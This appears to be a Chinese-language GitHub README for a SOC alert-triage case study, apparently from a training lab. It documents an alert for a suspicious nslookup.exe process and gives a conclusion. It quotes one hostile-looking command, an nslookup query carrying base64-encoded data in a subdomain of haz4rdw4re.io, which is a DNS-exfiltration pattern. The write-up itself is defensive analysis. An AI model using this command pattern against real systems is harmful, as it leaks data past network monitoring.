Huey-ashton36/soc-alert-triage-case-study
GitHub: Huey-ashton36/soc-alert-triage-case-study
记录一次 SOC 告警分诊与恶意软件分析的完整案例研究,展示从可疑进程执行到最终研判的调查过程。
Stars: 0 | Forks: 0
# soc-alert-triage-案例研究
SOC 告警分诊与恶意软件分析
soc-alert-triage-case-study/
│
├── README.md
├── evidence/
│ ├── alert-dashboard.png
│ ├── nslookup-command.png
│
└── investigation-notes.md
# SOC 告警分诊案例研究
## 概述
本项目记录了一项 SOC 告警分诊调查,通过对可疑的进程执行进行分析,以确定该活动是否为恶意行为。
## 告警摘要
- **告警类型:** 可疑的父子进程关系
- **严重程度:** 高
- **类别:** 进程执行
- **状态:** 等待调查
关键证据
可疑命令
"C:\Windows\system32\nslookup.exe" RmYjEyNGZiMTY1NjZlfQ==.haz4rdw4re.io
## 展示技能
告警分诊
进程分析
DNS 调查
威胁狩猎
恶意软件分析
MITRE ATT&CK 映射
分析
该告警由 nslookup.exe 的执行触发
子域名字段似乎是 base64 编码的
结论
该告警被归类为可疑,而非确认的恶意行为。
未发现任何支持的威胁指标,例如恶意 payload 执行、持久化、权限提升或横向移动。现有证据不足以将其升级为确认的安全事件。
标签:DAST, SOC分析, 告警分诊, 安全运营, 恶意软件分析, 扫描框架, 网络安全, 防御加固, 隐私保护